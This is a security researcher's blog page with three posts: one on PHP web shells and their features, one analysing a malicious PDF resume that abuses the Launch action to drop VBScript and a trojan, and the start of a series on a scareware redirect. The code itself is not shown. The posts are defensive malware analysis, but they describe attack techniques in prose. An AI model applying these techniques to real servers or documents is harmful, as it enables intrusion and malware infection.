Posted: July 1st, 2010 | Author: Matt | Filed under: InfoSec, Research | 1 Comment »
In a galaxy far, far away….
I probably should have written this before the previous post but hey, if George Lucas can do it with Star Wars then I think I can wangle it on a blog post or two. Not that I’m comparing myself to old Mr. Lucas or anything….
So…PHP shells.
I have to thank Barry Irwin (@barryirwin) for most of the samples I now have in my collection. I had come across various shells in my ramblings around the Internet but it’s only while working on various phishing cases (I used to work for a large financial) that I came into a much wider variety.
The basic premise behind a PHP shell is to give a remote attacker a certain degree of control over a victim web server. There seem to be two common ways to “get shell” on a web server.
- Compromised FTP credentials
- A really crappy version of Joomla/WordPress/Pick your favourite CMS
- Remote file include vulnerabilities (see #2)
So if you see things like this in your web server log files, start worrying:
But we’re getting a little ahead of ourselves. We know a PHP shell is for remotely “controlling” a web server but what is it in detail ?
Most of the shells I have come across are a single PHP file, usually under 200Kb in size. The file is then interpreted by the web server as a PHP file giving the attacker functions such as (but by no means limited to):
- Uploading file
- Changing permissions on exiting files
- A simple “command line” to run commands on
- A simple but effective file browser
The interface will look something like this:
As you can see the interface is pretty intuitive and gives loads of useful information about the target machine.
By simply clicking on a few buttons or typing the odd command, you can execute commands and create directories and files to your hearts content. But there’s a catch !! (It’s not a very big catch at the end of the day). You can only execute commands etc. with the privileges of the user that the web server is running as (usually apache/www-data/vpsserveruseraccount).
However, that’s not going to stop the attacker running netcat (which is on just about ever version of *nix out there) on a high port (above 1024) and making a shell available on the local server. From there it’s trivial to escalate privileges from nobody to root. But that’s a story for another day.
Some of the more malicious shells include things like backdoors coded in C or Perl which drop a little backdoor onto the system. This will either allow the attacker to connect directly to a port running a basic shell or sorts, or failing that, a reverse shell out to a server that is under the attackers control.
More malicious “plugins” include things like:
- FTP/SSH brute forcers
- MySQL / Database frontends
You’re only really limited by what you can code in PHP…
Obfuscation
Another trend that I’ve seen in a few of the more “31337″ shells is the use of obfuscation within the code. What happens is that instead of a plain old PHP file, they will use the built in functions within PHP to obfuscate the code contained within. All this is at the end of the day are simple gzip or base64 encodings of the code (or a fun combination of the two). I’m not entirely sure why this happens. It can’t be for IDS evasion as the code is still interpreted and sent in the clear. It may be for server side anti-virus evasion, but this seems unlikely as well. If anyone knows the reasoning behind this, please get in touch…
Here’s an example of some of the obfuscation I’ve seen…
Decoding these samples is fairly straight forward so I won’t bore you with the details here again 
So, to wrap it all up, we have a simple PHP file that somehow lands up on a web server, giving the attacker a very easy to use interface to “manage” a web server. In my experience, I’ve only really seen these shells in use with phishing sites. One has to ask if it’s all part of the fraud ecosystem and if so, how it all fits together…but that’s a story for the sequel…or prequel perhaps…I don’t know…I don’t have a decent Jar-Jar character to ruin it all with…
Posted: June 12th, 2010 | Author: Matt | Filed under: InfoSec, Research | Tags: google, pdf, Research, security | 2 Comments »
How it all began.
Today I was trawling through my Gmail spam folder like a good little mail monkey when I came across a rather strange bit of spam. Usually you just get rubbish about making your manhood the size of a small country or the latest twitter/gmail support/facebook AV malware. Most of the time I just ignore the messages due to them being very boring and not really worth a coffee and a few hours in Terminal…
Today’s message was a little different. It was a very simple email with the subject line “New Resume” and one line in the body of the email saying “Please review my CV, Thank You!“. So, seeing as I have NO idea who the sender was and that there are no issues with the PDF format that I know of, I saved the PDF document to my desktop as I had a virtual machine I just knew the PDF would love immediately.
For what it’s worth, the email originated out of Korea / 121.50.250.98
Red Flag Number One
(As if a PDF document from an unknown person on your spam folder isn’t enough)
Before that though I fired up pdfid.py from @DidierStevens which told me there were two “OpenAction” items in the document (these turned out to be the Launch action type). So we know there are at least two possible malicious elements to this document. Next I fired up Vim (because I’m a die hard vim fan and would use it as a vehicle to get to the moon if I could). A quick scan of the document came up with a number of things I’d like to look into later:
- /URI(mailto:a@foo.be)
- /URI(http://www.foo.be/)
Note: I thought these first two items were just random noise that the attacker had placed into the document to make it look more legitimate, but as it turns out the document is actually a valid resume of Alexandre Dulaunoy (adulau). There were a couple of other references to Alexandre, I picked up on this one after parsing the document with pdf-parser.py
As it turns out, spammers had picked up his CV through a Google search and simply added the nasty payload to it. Kudos to Alexandre for putting up a message on his home page about the problem shortly after the problem started.
HUGE Red Flag Number Two
Object 81 (pdf-parser.py -f -o 81)
The Launch action type which runs “cmd.exe” with a bunch of VBS scripts should be more than enough evidence that this PDF is out to hurt someone…
Launch Action type
So clearly we have a malicious PDF document that’s using the Launch action to get the payload onto the machine and executed. Didier Stvens wrote Escape From PDF back in March and it’s already been used in the latest iterations of the Zeus bot. It seems someone has picked up on this and is using it in this PDF. What this does is it relies on the user to allow the execution of the Launch (cmd.exe) through a prompt that comes up when you open the PDF document. The attacker has “obfuscated” the output a little as can be seen here:
When the user clicks Open, the Launch action fires off cmd.exe which will then interpret the embedded VBScript files and drop the malicious payloads onto the machine. More on that later..
The funny thing to note here is that if you simply click “Do not open” the malicious code doesn’t execute. That is of course if the user hasn’t checked the box that says “Do not show this message again”…
You can even scroll up on this message window and see all the good stuff going on yourself:
Still, we can’t expect the user to be so savvy as to scroll the scroll button and do a little reading now can we ?
Virtual Machine Abuse.
So we have a PDF document that has malicious content. What do we do now ?
We fire up Vmware with a fairly unpatched version of Windows XP. I ran this PDF through Adobe Reader 8.2 and Foxit Reader 3.2. Foxit didn’t do anything as they have patched against the Launch action type.
Adobe was a slightly different story. While Adobe did prompt me as can be seen in the screenshots above, let’s pretend for a second that I am a normal user and I don’t read dialogs at all. I clicked Open or that I had seen this dialog previously and had checked the little box that says “Do not show this message again”…
Clicking “Open” triggered the Launch action type and dropped vbs1.vbs onto my desktop (I believe this is because the PDF was originally on my desktop). You’ll remember that the vbs1.vbs script was included in the PDF document. Here’s what vbs1.vbs looks like:
I haven’t had much chance to skill up on VBScript yet, but I believe the vbs1.vbs script creates a new file vbs2.vbs from the contents of the PDF document. I will confirm this once I’ve has some time to dig through both scripts a little more. It’s interesting to note that the second VBS file does look like it’s been obfuscated slightly. Either that or it’s just the way the file type is represented. If you have any input on this, please let me know…here’s a portion of vbs2.vbs:
Once the two VBScript files had run, an EXE was dropped onto the desktop which was then executed. I believe this EXE to be included in the PDF document as the output from tcpdump doesn’t show any traffic going out to the Internet to fetch anything. This was the malicious payload. A quick scan with Virus Total shows the executable to be Alureon or something similar. Quite a nasty trojan / DNS changer…I’ve chatted to Alexandre after the incident and he believes the dropper may be pulling different malware down each time it runs. I will probably test this over the weekend if I can find the time and bandwidth to do so.
After the bomb dropped.
So we now have a compromised machine with a trojan executable being run on the machine. I didn’t leave it to run for all that long as it’s probably not a wise thing to do. All of this through a PDF document that was opened on a Windows machine running a fairly old copy of Adobe Reader.
It’s interesting to note that the PDF document only had a detection rate of 31% on Virus Total and a fairly common trojan was used as the payload (80% detection rate on VT). Why not use something a little simpler/quieter/APTier (sorry, I used APT) ? I could be very wrong on this one. Perhaps the dropper does pull down different malware depending on what type of machine it’s run from.
When dealing with PDF documents you HAVE to have two tools by Didier Stevens. pdfid.py to identify the document and it’s contents and pdf-parser.py to do the actual analysis. I also use vim to do a quick scan through the raw PDF.
On the Windows side, I used CaptureBAT to monitor file and registry changes. This just confirmed that cmd.exe was executing and creating the vbs1 and vbs2 files on the local machine.
I also copied the VBScript files and executable off the machine for later analysis. Thankfully AV was triggered during analysis (Microsoft Security Essentials) so we know it works (kind of). But then again, it triggered a little too late if you ask me.
I’m sure there’s a lesson to be learned somewhere in here but I am more concerned with having a cold beer at this point in time.
Thanks to the following people:
Gmail / Alexandre Dulaunoy / Didier Stevens / Mikko hypponen / Barry Irwin
MD5sums:
PDF Document: cff871a36828866de1f42574be016bb8
vbs1.vbs: 7897e6b5f2443d254a5890a28ef88079
vbs2.vbs: 25c926b0ac7285c627a3988f0a8e49d9
exe.exe: 069d17b209ebd4bb0f63365089154dc2
Posted: November 26th, 2009 | Author: Matt | Filed under: InfoSec, Research, malware | Tags: javascript, malware, Research, scareware | No Comments »
start part 1/3
#include disclaimer.h
I am by no means an expert at this sort of thing. Nor am I very good at it. This post is just about what I found today and some of the steps I took in my investigation of the problem. If you see where I have gone wrong or spot a mistake, please let me know. It’s the only way I learn.
background
Someone was doing some research on a famous designer named Dieter Rams. In particular there was a blue hair dryer that caught said someones eye. This is mostly because his search terms brought the hair dryer to the number one result in Google Image Search. So wanting to know more about the hair dryer the user clicked on the image. It went steadily downhill from there.
javascript
The image result to him to a blog post which has the photo, along with some hidden javascript in the page source which looked a little like so:
Embedded Javascript
Unfortunately that little piece of the puzzle seems to be completely missing as it’s since been removed from the site. I am also a little confused as to how it got there in the first place. It wasn’t in a comment, nor was it an upload. My only thought is that it’s an existing link to a site which has since been compromised and is hosting malicious javascript…
the scan.
The first time I followed the link to the “Blue Hair Dryer of Doom” ™ I was redirected to pcmedicalbilling.com which then proceeded to tell me my machine was infected and needed to be scanned. I believe the redirection was handled by the above Javascript but without having the original source it’s hard to say. The scary thing about this is that I checked with Google and F-Secure and both said the link was good. It was only toward the end of the day that it finally got marked as malicious.
So upon loading the page you will get presented with a neat little warning claiming shenanigans afoot on your PC. I love the fact that my browser now knows when my PC is infected with malware. Great work Safari !
Warning !
This will then kick off into a “scan” of your machine where it will find enough infections of various flavours to warrant you downloading something to deal with the problem.
Scanning your machine for infection
Here you can see your machine is truly infected and in desparate need of some software assisted cleansing.
Oh no..I'm infected....
And what do you know ? They have just the application to help you out with this…
Help is on the way
Looking at the “scan” results page you can see how easily it would dupe Joe Bloggs. It’s pretty convincing. What bothers me most about this incident is that while the search terms may have been fairly specific to the user, who’s to say that this doesn’t happen much more often. There was no dodgy links being followed, no search for pornography, just a guy trying to do research for his job…
so we have an executable
We now have an executable downloaded to our machine. I haven’t had the time to reverse engineer it yet. Mostly because I haven’t had the chance to learn reverse engineering of PE files. Yet. There was a lot more code involved here. Some very interesting javascript which was fairly obfuscated. I will be posting about this once I have had the time to sit down and analyze the code. Look out for the follow up in the next couple of days…
end of part 1/3
